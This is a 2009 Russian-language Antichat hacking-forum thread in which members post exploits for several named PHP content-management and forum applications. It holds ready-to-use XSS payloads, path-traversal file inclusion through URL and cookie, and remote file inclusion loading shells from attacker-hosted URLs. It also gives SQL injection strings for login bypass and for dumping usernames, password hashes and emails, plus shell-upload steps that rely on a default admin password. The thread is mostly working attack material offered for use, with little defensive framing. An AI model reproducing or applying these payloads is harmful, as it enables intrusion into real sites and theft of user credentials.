Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
13.12.2009, 00:11
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
^^ еще версия PHP >= 5.2.0
и не allow_url_open, а allow_url_include
Последний раз редактировалось Spyder; 13.12.2009 в 00:15..
|
|
|
13.12.2009, 00:22
|
|
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832
Репутация:
1588
|
|
Product - ZAKRZAK
Version - 0.01
Active XSS
Url - http://localhost/index.php?page=gbook
Exploit
Код:
'"/><script>alert("xss");</script>
Раскрытые Пути
Код:
http://localhost/index.php?page=settings&part[]=
|
|
|
|
ClanTiger CMS 1.0<=1.1.3 Local File Inclusion |
13.12.2009, 18:16
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552
Репутация:
1668
|
|
ClanTiger CMS 1.0<=1.1.3 Local File Inclusion
ClanTiger CMS
Web site : http://www.clantiger.com
Vesrion : 1.0<=1.1.3
[Local File Inclusion]
Vuln file: functions/class.language.php [str:73]
PHP код:
if(isset($_GET['lang']))
{
$selectedLanguage = $_GET['lang'];
}
else if($_COOKIE['lang'])
{
$selectedLanguage = $_COOKIE['lang'];
}
else
{
// resort to default
$selectedLanguage = $settings['language'];
}
// see whether the language exists
if(!in_array($selectedLanguage,$this->validLanguages,true))
{
$this->selectedLanguage = $this->validLanguages[$settings['language']];
}
else
{
$this->selectedLanguage = $this->validLanguages[$selectedLanguage];
}
// attempt to load in the translations file
if(!@include_once(ROOTPATH . 'language/' . strtolower($selectedLanguage) . '.php'))
Exploit #1:
Код:
http://[host]/[path]/index.php?lang=../../../../../../../[local_file]%00
Exploit #2:
Код:
GET http://[host]/[path]/index.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: [host]
Content-Length: 59
Connection: Close
Cookie: lang=../../../../../../../[local_file]%00
Для успешной эксплуатации необходимо:
magic quotes = OFF
|
|
|
|
14.12.2009, 20:11
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552
Репутация:
1668
|
|
DynPG CMS 4.0.0
Web site : http://www.dynpg.org
Vesrion : 4.0.0
[Remote File Inclusion]
Vuln file: counter.php [str:15]
PHP код:
$inc = empty($_GET["inc"]) ? 0 : $_GET["inc"];
if ( !empty($inc) ) {
# Aufruf des Counters ьber einen Link. $inc enthдlt dann die Datenbankkennung!
$inc_or = htmlentities(urldecode($inc));
$inc_head = urldecode(str_replace('&', '&', $inc));
$inc = addslashes(strtolower($inc));
if ( empty($GLOBALS["DefineRootToTool"]) ) {
$GLOBALS["DefineRootToTool"] = "";
}
require_once $GLOBALS["DefineRootToTool"]."config.php";
Exploit:
if register_globals = ON && allow_url_include = ON
Код:
http://[host]/[path]/counter.php?inc=1&DefineRootToTool=[shell]?
[Local File Inclusion]
Vuln file: languages.inc.php [str:5]
PHP код:
global $lang_dpg;
require_once dirname(__FILE__) . '/plugins/languages.php';
require_once dirname(__FILE__) . '/localised/dynpg_backend/'.strtolower($_SESSION["LANGUAGE"]).'.lang.php';
Exploit:
if register_globals = ON && magic_quotes = OFF
Код:
http://[host]/[path]/languages.inc.php?_SESSION[LANGUAGE]=../../../../../../../../[local_file]%00
|
|
|
|
15.12.2009, 11:40
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
Программа: MySmartBB 1.1.0
Сайт: mysmartbb.com
Описание уязвимости: возможен обход авторизации
Уязвимый код login.php:
PHP код:
$password = md5($_POST['T2']);
$check = $DB->sql_query("SELECT * FROM MySBB_member WHERE username='" . $_POST['T1'] . "' AND password='" . $password . "'");
$num = $DB->sql_num_rows($check);
эксплойт:
Код:
login: 'or+5=5#
password: asdfg
если версия MySQL = 5 то можно вывести данные из бд таким POST запросом:
Код:
T1='+and+1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((select+concat_ws(0x3a,username,password,email)+from+mysbb_member+limit+1),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((select+concat_ws(0x3a,username,password,email)+from+mysbb_member+limit+1),14)e)b)a)+--+&T2=1233&B1=%E3%E6%C7%DD%DE
|
|
|
|
17.12.2009, 03:02
|
|
Постоянный
Регистрация: 13.02.2008
Сообщений: 505
Провел на форуме:
2916750
Репутация:
277
|
|
AmiroCMS-Free-5.4.4.0
Раскрытие путей
Код:
http://localhost:7777/eshop_final.php
Код:
Fatal error: main() [function.require]: Failed opening required '_shared/code/includes/eshop_final.php' (include_path='.;/usr/local/php/PEAR') in C:\WebServers\home\localhost\www\AmiroCMS\home\localhost\www\eshop_final.php on line 4
Код:
http://localhost:7777/unattened.old.php
Код:
Parse error: syntax error, unexpected T_STRING in C:\WebServers\home\localhost\www\AmiroCMS\home\localhost\www\unattened.old.php on line 4
Уязвимую часть кода к сожалению не смогу показать,зазендено,потом выложу,когда раззендю 
|
|
|
|
19.12.2009, 00:31
|
|
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832
Репутация:
1588
|
|
Nazep
Product - Nazep
Version - 0.1.4.3
SQL injection
Код:
http://localhost/index/index.php?sec=-1'/**/union/**/all/**/select/**/version()/*
вывод
Admin Panel
Код:
http://localhost/admon/index.php
Login
login - 'or+1=1#
pass - 123456
Последний раз редактировалось [x60]unu; 19.12.2009 в 00:40..
|
|
|
|
19.12.2009, 16:57
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440
Репутация:
648
|
|
Moscuito CMS (all vers) - блоговый движок на файлах.
PHPSELF XSS:
Код:
http://localhost/mosquito/%3E%3Cscript%3Ealert()%3C/script%3E
Заливка шелла: Админцентр (дефолтный пароль - pass)-> Новый (плагин) -> <?php include('http://site.com/sh.txt'); ?>
|
|
|
|
20.12.2009, 00:14
|
|
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224
Репутация:
388
|
|
Arcadem Pro CMS [2.7]
xss пассивная:
[localhost]/index.php?cat= "><script>alert();</script>
xss пассивная:
[localhost]/index.php?article= "><script>alert();</script>
xss активная:
При регистрации, в поле "Логин" вписываем
"><script>alert();</script>
, регистрирумся. При просмотре игроков, статистики и т.д. будет выполняться ваш код.
xss активная:
[localhost]/index.php?loadpage=./includes/articleblock.php&articlecat=[number]
в строке поле комментария вводим
"><script>alert();</script>
и отправляем. При просмотре комментариев выполнится ваш код.
Blind SQL injection:
[localhost]/index.php?article=[number] +and+ascii(substring(version(),19,1))+--+Bb0y
уязвимый код:
PHP код:
$articleid = $_GET['article'];
if (is_numeric(intval($articleid)) == TRUE) {
$sql = "SELECT * FROM AMCMS_articles WHERE articlekey=$articleid LIMIT 1;";
Последний раз редактировалось Bb0y; 20.12.2009 в 00:17..
|
|
|
|
20.12.2009, 15:16
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Direct News, основная часть выше,изза переноса сообщения раззлетелись 
RFI
Необходимо для правильной работы RFI! register_globals = ON and allow_url_open = ON!
file: /admin/inc.php
PHP код:
$from_inc = true;
header("Content-Type: text/html; charset=utf-8");
if (!file_exists($rootpath .'/config.php')) {
header('Location: '. $adminroot .'/install/');
die();
}
// Compatibilite entre les versions de PHP
require_once $rootpath .'/library/lib.compatibility.php';
// gestion de session
require_once $rootpath .'/library/class.config.php';
require_once $rootpath .'/modules/panier/class.panier_article.php';
....
target:admin/inc.php?rootpath=http://yousite.ru/shellcode.txt?
Последний раз редактировалось m0Hze; 20.12.2009 в 19:00..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [x60]unu](/avatars/avatar84758.gif){kind=avatar}
![Отправить сообщение для [x60]unu с помощью ICQ](fusion/misc/im_icq.gif)
Похожие темы
Линейный вид
